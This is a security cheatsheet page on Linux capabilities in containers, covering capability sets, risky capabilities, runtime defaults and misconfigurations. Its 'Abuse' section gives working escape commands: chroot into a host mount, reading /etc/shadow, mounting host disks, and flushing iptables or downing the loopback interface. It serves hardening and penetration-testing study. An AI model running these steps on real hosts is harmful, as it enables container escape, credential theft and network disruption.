daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

capabilities.md (13670B)


      1 ---
      2 title: "Linux Capabilities In Containers"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/capabilities.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/capabilities.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Linux Capabilities In Containers
     14 
     15 ## Overview
     16 
     17 Linux capabilities are one of the most important pieces of container security because they answer a subtle but fundamental question: **what does "root" really mean inside a container?** On a normal Linux system, UID 0 historically implied a very broad privilege set. In modern kernels, that privilege is decomposed into smaller units called capabilities. A process may run as root and still lack many powerful operations if the relevant capabilities have been removed. <sup>[[1]](#references)</sup>
     18 
     19 Containers depend on this distinction heavily. Many workloads are still launched as UID 0 inside the container for compatibility or simplicity reasons. Without capability dropping, that would be far too dangerous. With capability dropping, a containerized root process can still perform many ordinary in-container tasks while being denied more sensitive kernel operations. That is why a container shell that says `uid=0(root)` does not automatically mean "host root" or even "broad kernel privilege". The capability sets decide how much that root identity is actually worth.
     20 
     21 For the full Linux capability reference and many abuse examples, see:
     22 
     23 [Linux Capabilities](/hacktricks/linux-hardening/interesting-files-permissions/linux-capabilities)
     24 
     25 ## Operation
     26 
     27 Capabilities are tracked in several sets, including permitted, effective, inheritable, ambient, and bounding sets. For many container assessments, the exact kernel semantics of each set are less immediately important than the final practical question: **which privileged operations can this process successfully perform right now, and which future privilege gains are still possible?** <sup>[[1]](#references)</sup>
     28 
     29 The reason this matters is that many breakout techniques are really capability problems disguised as container problems. A workload with `CAP_SYS_ADMIN` can reach a huge amount of kernel functionality that a normal container root process should not touch. A workload with `CAP_NET_ADMIN` becomes much more dangerous if it also shares the host network namespace. A workload with `CAP_SYS_PTRACE` becomes much more interesting if it can see host processes through host PID sharing. In Docker or Podman that may appear as `--pid=host`; in Kubernetes it usually appears as `hostPID: true`.
     30 
     31 In other words, the capability set cannot be evaluated in isolation. It has to be read together with namespaces, seccomp, and MAC policy.
     32 
     33 ## Lab
     34 
     35 A very direct way to inspect capabilities inside a container is:
     36 
     37 ```bash
     38 docker run --rm -it debian:stable-slim bash
     39 apt-get update && apt-get install -y libcap2-bin
     40 capsh --print
     41 ```
     42 
     43 You can also compare a more restrictive container with one that has all capabilities added:
     44 
     45 ```bash
     46 docker run --rm debian:stable-slim sh -c 'grep CapEff /proc/self/status'
     47 docker run --rm --cap-add=ALL debian:stable-slim sh -c 'grep CapEff /proc/self/status'
     48 ```
     49 
     50 To see the effect of a narrow addition, try dropping everything and adding back only one capability:
     51 
     52 ```bash
     53 docker run --rm --cap-drop=ALL --cap-add=NET_BIND_SERVICE debian:stable-slim sh -c 'grep CapEff /proc/self/status'
     54 ```
     55 
     56 These small experiments help show that a runtime is not simply toggling a boolean called "privileged". It is shaping the actual privilege surface available to the process.
     57 
     58 ## High-Risk Capabilities
     59 
     60 Although many capabilities can matter depending on the target, a few are repeatedly relevant in container escape analysis.
     61 
     62 **`CAP_SYS_ADMIN`** is the one defenders should treat with the most suspicion. It is often described as "the new root" because it unlocks an enormous amount of functionality, including mount-related operations, namespace-sensitive behavior, and many kernel paths that should never be casually exposed to containers. If a container has `CAP_SYS_ADMIN`, weak seccomp, and no strong MAC confinement, many classic breakout paths become much more realistic.
     63 
     64 **`CAP_SYS_PTRACE`** matters when process visibility exists, especially if the PID namespace is shared with the host or with interesting neighboring workloads. It can turn visibility into tampering.
     65 
     66 **`CAP_NET_ADMIN`** and **`CAP_NET_RAW`** matter in network-focused environments. On an isolated bridge network they may already be risky; on a shared host network namespace they are much worse because the workload may be able to reconfigure host networking, sniff, spoof, or interfere with local traffic flows.
     67 
     68 **`CAP_SYS_MODULE`** is usually catastrophic in a rootful environment because loading kernel modules is effectively host-kernel control. It should almost never appear in a general-purpose container workload.
     69 
     70 ## Runtime Usage
     71 
     72 Docker, Podman, containerd-based stacks, and CRI-O all use capability controls, but the defaults and management interfaces differ. Docker exposes them directly through flags such as `--cap-drop` and `--cap-add`. Podman exposes similar controls and commonly combines them with rootless execution as an additional safety layer. Kubernetes surfaces capability additions and drops through the Pod or container `securityContext`; lower-level runtimes express the resulting sets in the OCI runtime configuration. System-container environments such as LXC and Incus also rely on capability control, but their broader host integration can tempt operators to relax defaults more aggressively than they would for an application container. <sup>[[2]](#references)</sup> <sup>[[3]](#references)</sup> <sup>[[4]](#references)</sup> <sup>[[5]](#references)</sup> <sup>[[6]](#references)</sup>
     73 
     74 The same principle holds across all of them: a capability that is technically possible to grant is not necessarily one that should be granted. Many real-world incidents begin when an operator adds a capability simply because a workload failed under a stricter configuration and the team needed a quick fix.
     75 
     76 ## Misconfigurations
     77 
     78 The most obvious mistake is **`--cap-add=ALL`** in Docker/Podman-style CLIs, but it is not the only one. In practice, a more common problem is granting one or two extremely powerful capabilities, especially `CAP_SYS_ADMIN`, to "make the application work" without also understanding the namespace, seccomp, and mount implications. Another common failure mode is combining extra capabilities with host namespace sharing. In Docker or Podman this may appear as `--pid=host`, `--network=host`, or `--userns=host`; in Kubernetes the equivalent exposure usually appears through workload settings such as `hostPID: true` or `hostNetwork: true`. Each of those combinations changes what the capability can actually affect.
     79 
     80 It is also common to see administrators believe that because a workload is not fully `--privileged`, it is still meaningfully constrained. Sometimes that is true, but sometimes the effective posture is already close enough to privileged that the distinction stops mattering operationally.
     81 
     82 ## Abuse
     83 
     84 The first practical step is to enumerate the effective capability set and immediately test the capability-specific actions that would matter for escape or host information access:
     85 
     86 ```bash
     87 capsh --print
     88 grep '^Cap' /proc/self/status
     89 ```
     90 
     91 If `CAP_SYS_ADMIN` is present, test mount-based abuse and host filesystem access first, because this is one of the most common breakout enablers:
     92 
     93 ```bash
     94 mkdir -p /tmp/m
     95 mount -t tmpfs tmpfs /tmp/m 2>/dev/null && echo "tmpfs mount works"
     96 mount | head
     97 find / -maxdepth 3 -name docker.sock -o -name containerd.sock -o -name crio.sock 2>/dev/null
     98 ```
     99 
    100 If `CAP_SYS_PTRACE` is present and the container can see interesting processes, verify whether the capability can be turned into process inspection:
    101 
    102 ```bash
    103 capsh --print | grep cap_sys_ptrace
    104 ps -ef | head
    105 for p in 1 $(pgrep -n sshd 2>/dev/null); do cat /proc/$p/cmdline 2>/dev/null; echo; done
    106 ```
    107 
    108 If `CAP_NET_ADMIN` or `CAP_NET_RAW` is present, test whether the workload can manipulate the visible network stack or at least gather useful network intelligence:
    109 
    110 ```bash
    111 capsh --print | grep -E 'cap_net_admin|cap_net_raw'
    112 ip addr
    113 ip route
    114 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null
    115 ```
    116 
    117 When a capability test succeeds, combine it with the namespace situation. A capability that looks merely risky in an isolated namespace can become an escape or host-recon primitive immediately when the container also shares host PID, host network, or host mounts.
    118 
    119 ### Full Example: `CAP_SYS_ADMIN` + Host Mount = Host Escape
    120 
    121 If the container has `CAP_SYS_ADMIN` and a writable bind mount of the host filesystem such as `/host`, the escape path is often straightforward:
    122 
    123 ```bash
    124 capsh --print | grep cap_sys_admin
    125 mount | grep ' /host '
    126 ls -la /host
    127 chroot /host /bin/bash
    128 ```
    129 
    130 If `chroot` succeeds, commands now execute in the host root filesystem context:
    131 
    132 ```bash
    133 id
    134 hostname
    135 cat /etc/shadow | head
    136 ```
    137 
    138 If `chroot` is unavailable, the same result can often be achieved by calling the binary through the mounted tree:
    139 
    140 ```bash
    141 /host/bin/bash -p
    142 export PATH=/host/usr/sbin:/host/usr/bin:/host/sbin:/host/bin:$PATH
    143 ```
    144 
    145 ### Full Example: `CAP_SYS_ADMIN` + Device Access
    146 
    147 If a block device from the host is exposed, `CAP_SYS_ADMIN` can turn it into direct host filesystem access:
    148 
    149 ```bash
    150 ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null
    151 mkdir -p /mnt/hostdisk
    152 mount /dev/sda1 /mnt/hostdisk 2>/dev/null || mount /dev/vda1 /mnt/hostdisk 2>/dev/null
    153 ls -la /mnt/hostdisk
    154 chroot /mnt/hostdisk /bin/bash 2>/dev/null
    155 ```
    156 
    157 ### Full Example: `CAP_NET_ADMIN` + Host Networking
    158 
    159 This combination does not always produce host root directly, but it can fully reconfigure the host network stack:
    160 
    161 ```bash
    162 capsh --print | grep cap_net_admin
    163 ip addr
    164 ip route
    165 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null
    166 ip link set lo down 2>/dev/null
    167 iptables -F 2>/dev/null
    168 ```
    169 
    170 That can enable denial of service, traffic interception, or access to services that were previously filtered.
    171 
    172 ## Checks
    173 
    174 The goal of the capability checks is not only to dump raw values but to understand whether the process has enough privilege to make its current namespace and mount situation dangerous.
    175 
    176 ```bash
    177 capsh --print                    # Human-readable capability sets and securebits
    178 grep '^Cap' /proc/self/status    # Raw kernel capability bitmasks
    179 ```
    180 
    181 What is interesting here:
    182 
    183 - `capsh --print` is the easiest way to spot high-risk capabilities such as `cap_sys_admin`, `cap_sys_ptrace`, `cap_net_admin`, or `cap_sys_module`.
    184 - The `CapEff` line in `/proc/self/status` tells you what is actually effective now, not just what might be available in other sets.
    185 - A capability dump becomes much more important if the container also shares host PID, network, or user namespaces, or has writable host mounts.
    186 
    187 After collecting the raw capability information, the next step is interpretation. Ask whether the process is root, whether user namespaces are active, whether host namespaces are shared, whether seccomp is enforcing, and whether AppArmor or SELinux still restricts the process. A capability set by itself is only part of the story, but it is often the part that explains why one container breakout works and another fails with the same apparent starting point.
    188 
    189 ## Runtime Defaults
    190 
    191 | Runtime / platform | Default state | Default behavior | Common manual weakening |
    192 | --- | --- | --- | --- |
    193 | Docker Engine | Reduced capability set by default | Docker keeps a default allowlist of capabilities and drops the rest | `--cap-add=<cap>`, `--cap-drop=<cap>`, `--cap-add=ALL`, `--privileged` |
    194 | Podman | Reduced capability set by default | Podman containers are unprivileged by default and use a reduced capability model | `--cap-add=<cap>`, `--cap-drop=<cap>`, `--privileged` |
    195 | Kubernetes | Inherits runtime defaults unless changed | If no `securityContext.capabilities` are specified, the container gets the default capability set from the runtime | `securityContext.capabilities.add`, failing to `drop: [\"ALL\"]`, `privileged: true` |
    196 | containerd / CRI-O under Kubernetes | Usually runtime default | The effective set depends on the runtime plus the Pod spec | same as Kubernetes row; direct OCI/CRI configuration can also add capabilities explicitly |
    197 
    198 For Kubernetes, the important point is that the API does not define one universal default capability set. If the Pod does not add or drop capabilities, the workload inherits the runtime default for that node.
    199 
    200 ## References
    201 
    202 - [1] [capabilities(7) - Linux manual page](https://man7.org/linux/man-pages/man7/capabilities.7.html)
    203 - [2] [Open Container Initiative - Linux container configuration](https://github.com/opencontainers/runtime-spec/blob/main/config-linux.md#process)
    204 - [3] [Docker Docs - Runtime privilege and Linux capabilities](https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities)
    205 - [4] [Kubernetes Documentation - Set capabilities for a container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container)
    206 - [5] [Podman documentation - `--cap-add` and `--cap-drop`](https://docs.podman.io/en/latest/markdown/podman-run.1.html#cap-add-capability)
    207 - [6] [Incus documentation - Security](https://linuxcontainers.org/incus/docs/main/explanation/security/)